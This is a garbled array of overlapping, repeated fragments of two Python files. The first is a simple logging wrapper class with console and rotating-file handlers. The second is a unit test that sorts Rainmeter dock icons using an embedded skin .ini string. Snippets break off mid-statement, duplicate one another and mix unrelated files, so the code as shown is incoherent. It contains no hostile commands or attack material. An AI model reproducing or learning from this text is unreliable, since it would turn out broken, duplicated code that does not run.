Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this", "logger = Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this is a info", "def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING,", "CRITICAL = 1 ERROR = 2 WARNING = 3 INFO = 4 DEBUG", "#!/usr/bin/env python # -*- coding: utf-8 -*- import os import logging import logging.handlers", "not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') #", "DEBUG: logging.DEBUG } if level < CRITICAL or level > DEBUG: level =", "self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log', INFO)", "logging import logging.handlers CRITICAL = 1 ERROR = 2 WARNING = 3 INFO", "-*- coding: utf-8 -*- import os import logging import logging.handlers CRITICAL = 1", "logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL or level >", "控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20)", "import os import logging import logging.handlers CRITICAL = 1 ERROR = 2 WARNING", "CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level", "debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self,", "backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def", "< CRITICAL or level > DEBUG: level = DEBUG logLevel = dictLevel[level] #", "logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt)", "文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message)", "DEBUG: level = DEBUG logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir", "critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is", "level = DEBUG logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir =", "info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self,", "self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\":", "os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志", "or level > DEBUG: level = DEBUG logLevel = dictLevel[level] # mkdir abspath", "sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def", "self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message)", "logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh", "= 5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL,", "logging.handlers CRITICAL = 1 ERROR = 2 WARNING = 3 INFO = 4", "level > DEBUG: level = DEBUG logLevel = dictLevel[level] # mkdir abspath =", "2 WARNING = 3 INFO = 4 DEBUG = 5 class Logger: def", "python # -*- coding: utf-8 -*- import os import logging import logging.handlers CRITICAL", "__init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO:", "def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger", "logging.DEBUG } if level < CRITICAL or level > DEBUG: level = DEBUG", "mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger =", "dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt =", "5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR:", "\"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this is a", "Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this is a info message') logger.warn('this", "= os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s]", "{ CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if", "= 2 WARNING = 3 INFO = 4 DEBUG = 5 class Logger:", "import logging import logging.handlers CRITICAL = 1 ERROR = 2 WARNING = 3", "DEBUG = 5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL:", "fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) #", "fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO,", "= logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志", "= 1 ERROR = 2 WARNING = 3 INFO = 4 DEBUG =", "fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self,", "logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL or", "a debug message') logger.info('this is a info message') logger.warn('this is a warn message')", "ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL", "self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh =", "DEBUG logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if", "warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__", "= logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self,", "fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message):", "== \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this is", "message): self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a", "WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL or level", "message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message):", "is a debug message') logger.info('this is a info message') logger.warn('this is a warn", "# 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message):", "if __name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a debug message')", "level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG:", "} if level < CRITICAL or level > DEBUG: level = DEBUG logLevel", "[%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh =", "maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message)", "sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self,", "self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message)", "message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message):", "message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log',", "WARNING = 3 INFO = 4 DEBUG = 5 class Logger: def __init__(self,", "= os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel)" ]
[ "import matplotlib.pyplot as plt import numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\")", "plt import numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber (cm-1)\") plt.ylabel(\"spectrum\")", "numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber (cm-1)\") plt.ylabel(\"spectrum\") plt.legend() plt.savefig(\"compspec_luhman16A.png\")", "import numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber (cm-1)\") plt.ylabel(\"spectrum\") plt.legend()", "matplotlib.pyplot as plt import numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber", "as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber (cm-1)\") plt.ylabel(\"spectrum\") plt.legend() plt.savefig(\"compspec_luhman16A.png\") plt.show()", "as plt import numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber (cm-1)\")" ]
[ "= [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video", "import unittest import mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock", "[MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin", "import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by", "\"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons):", "APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"]", "Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute", "[\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\",", "T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\",", "added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags= License= Variant=", "class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert", "RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags= License= Variant= Preview= ;End", "IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button", "import mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata", "program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new", "Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button", "Description= Instructions= Version= Tags= License= Variant= Preview= ;End of added Metadata ;----------------------------------------------------------------------- ;", "help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names", "assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\",", "IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor]", "icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\"", "\"video editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name", "Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter", "help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker", "[\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini)", "test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self):", "app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\",", "\"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names =", "Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T =", "[\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota", "Name= Config= Description= Instructions= Version= Tags= License= Variant= Preview= ;End of added Metadata", "RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter", "editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help", "icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons =", "Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction]", "[iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video editor\",", "by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags= License= Variant= Preview=", "------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags=", "Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions=", "SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\")", "iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser", ";End of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin]", "RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter", "Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ;", "ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute", "Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;---------------------------------------------------------------------------", "junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\"", ";--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test", "junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase):", "test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin", "[stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie", "\"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name", "Version= Tags= License= Variant= Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES", "Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT", "def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def", "= [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name,", "Instructions= Version= Tags= License= Variant= Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; MEASURES", "\"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names]", "IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS", "icon_get import unittest import mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid", "[\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test", "[\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test", "icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new program\",", "[video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow", "Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter", "\"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name=", "test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons", "def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"]", ";http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags= License= Variant= Preview= ;End of", "Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R", "= icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names =", "[Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self):", "icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name ==", "Config= Description= Instructions= Version= Tags= License= Variant= Preview= ;End of added Metadata ;-----------------------------------------------------------------------", "ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test", "junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie", "junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie", "junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow", "[BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0", "maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute", "mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added", "maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for", "assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie", "[Metadata] Name= Config= Description= Instructions= Version= Tags= License= Variant= Preview= ;End of added", "[movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria]", "editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help]", "icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\"", "icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test", "PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc", "unittest import mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------", "T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new", "Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button", "Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser 